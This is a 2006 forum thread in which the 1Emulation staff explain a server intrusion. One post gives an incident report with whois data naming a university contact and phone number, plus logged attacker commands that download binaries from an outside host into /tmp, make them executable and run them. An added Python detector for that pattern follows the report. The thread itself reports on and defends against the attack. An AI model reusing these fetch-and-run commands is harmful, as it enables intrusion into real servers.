Alpha Posted April 11, 2006
Sorry for the 1 day downtime; we had some hacker trouble yesterday afternoon. Apparently they thought they were smart enough to overtake the entire server, but they had no idea who they were messing with. There shouldn't be any more downtime for a while as we have patched up the server. Currently, we are hoping to get our own dedicated server, but we're short on money. If you can DONATE, that would be much appreciated.
Regards,
1Emulation Staff
»» Donate to 1Emulation Servers
garyoak99 Posted April 11, 2006
Thanks for the update! I'm just glad the forum is back!
someboddy Posted April 11, 2006
Quote: wtf who has a beef with 1 emu?
We are not sure the attack was against 1Emulation. There are other sites on this server.
Alpha (Author) Posted April 11, 2006
Quote: wtf who has a beef with 1 emu?
Quote: We are not sure the attack was against 1Emulation. There are other sites on this server.
From the looks of it, we were affected the worst. So it could have very well been us, but we won't be able to know for certain.
Weirdy Posted April 11, 2006
Was it some kind of F5 terrorist? Perhaps it could've been our good ol' friend Eugene.
Edited April 11, 2006 by Weirdy
fischju Posted April 11, 2006
Did you ban any1 recently that seemed 1337 in any way? And F5 is old... I like to find files hosted on a server and download and delete them with a script and leave it on overnight... not that I would do that to you guys... just saying
Alpha (Author) Posted April 11, 2006
Quote: Did you ban any1 recently that seemed 1337 in anyway? And F5 is old...i like to find files hosted on a server and download and delete them with a script and leave it on overnight.....not that I would do that to you guys.....just saying
I haven't banned anyone since January. And I haven't a sign of the guy I banned anywhere. He didn't seem 1337 either, only a proxy-tard.
miskie Posted April 11, 2006
Hacker report:

The hacker's last IP address before getting into the server was 147.46.127.205. This is the data I can pull on it:

    # ENGLISH
    KRNIC is not an ISP but a National Internet Registry similar to APNIC.
    The followings is organization information that is using the IPv4 address.

    IPv4 Address      : 147.46.0.0-147.46.255.255
    Network Name      : NET-SNU
    Registration Date : 20040625
    Publishes         : Y

    [ Organization Information ]
    Organization ID   : ORG384075
    Org Name          : Seoul National University
    Address           : Sillim9-dong, Gwanak-gu, Seoul
    Detail address    : San56-1Beonji Jungangjeonsanwon
    Zip Code          : 151-742

    [ Technical Contact Information ]
    Name              : Eunjoo Jung
    Org Name          : Seoul National University
    Address           : Sillim9-dong, Gwanak-gu, Seoul
    Detail address    : San56-1Beonji Jungangjeonsanwon
    Zip Code          : 151-742
    Phone             : +82-2-880-5380
    E-Mail            : ********@plaza.snu.ac.kr

Once they got in thru this exploit http://www.google.com/search?hl=en&q=Psych...G=Google+Search their IP became 127.0.0.1 and their username apache.

Here's some log data of what they did once inside, pretending to be apache. Here the user is downloading crap into the server's TMP folder:

    --16:51:24--  http://xpl.netmisphere2.com/r0nin
               => `r0nin'
    Resolving xpl.netmisphere2.com... done.
    Connecting to xpl.netmisphere2.com[82.237.120.143]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 19,258 [application/x-executable]

        0K..................  100%   45.98 KB/s

    16:51:25 (45.98 KB/s) - `r0nin' saved [19258/19258]

And here is some other stuff they ran before I caught them:

    finger
    cd /tpm
    cd /tmp
    wget http://xpl.netmisphere2.com/brk2
    chmod 777 brk2
    ./brk2
    wget http://xpl.netmisphere2.com/uselib24
    chmod 777 uselib24
    ./uselib24
    ./uselib24
    id
    ./uselib24

Though this looks bad, this kind of hack is more of a PITA than a security-threatening one - they disrupted the server and apparently banged the hell out of 1emulation's database. I can't be sure if it was directed or not (since once they were in they 'became' apache, which the server doesn't see as a threat) at 1emulation specifically, or if this site was just chosen at random.

Anyway, all the code has been deleted, the exploits have been plugged. I've been watching the server for the last couple of hours and there is nothing going on of interest at all.
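Added example, not part of miskie's post or the site's own tooling: a Python check that scans per-user command records for the pattern in the session above, where a web-server account downloads a file into a world-writable directory, makes it executable and runs it. The (user, command) record format, the service-account list and the example.invalid sample data are assumptions.

```python
import shlex

# Constructed sample records (user, command); format and hosts are assumptions.
SAMPLE = [
    ("apache", "finger"),
    ("apache", "cd /tpm"),
    ("apache", "cd /tmp"),
    ("apache", "wget http://example.invalid/toolA"),
    ("apache", "chmod 777 toolA"),
    ("apache", "./toolA"),
    ("apache", "./toolA"),
    ("alice", "wget http://example.invalid/notes.txt"),
    ("apache", "wget http://example.invalid/toolB"),
    ("apache", "id"),
]
SERVICE_USERS = {"apache", "www-data", "nobody"}  # should never fetch and run files
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable staging spots


def in_writable_dir(path):
    return any(path == d or path.startswith(d + "/") for d in WRITABLE_DIRS)


def find_staged_executions(records):
    """Return (user, directory, filename) for every file a service account
    downloaded into a writable directory, chmod-ed and then executed."""
    cwd, stage, hits = {}, {}, []
    for user, line in records:
        argv = shlex.split(line)
        if not argv or user not in SERVICE_USERS:
            continue
        here = cwd.get(user, "/")
        if argv[0] == "cd" and len(argv) > 1:
            # Absolute paths only; a failed cd is not modelled.
            cwd[user] = argv[1].rstrip("/") or "/"
        elif argv[0] in ("wget", "curl") and in_writable_dir(here):
            stage[(user, here, argv[-1].rstrip("/").rsplit("/", 1)[-1])] = "downloaded"
        elif argv[0] == "chmod" and len(argv) > 2:
            for name in argv[2:]:
                key = (user, here, name.rsplit("/", 1)[-1])
                if stage.get(key) == "downloaded":
                    stage[key] = "executable"
        elif argv[0].startswith("./"):
            key = (user, here, argv[0][2:])
            if stage.get(key) == "executable":
                hits.append(key)
                stage[key] = "reported"  # report each staged file once
    return hits
```

Fed from process accounting or audit records, a hit for the web-server account is worth an alert on its own, since that account has no normal reason to fetch and run binaries.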
Agozer Posted April 11, 2006
Well, things are back to normal. Let's resume our daily forum activities.
CJ Jackson Posted April 11, 2006
That explains the earlier MySQL error "Too Many Connections", this is just criminal.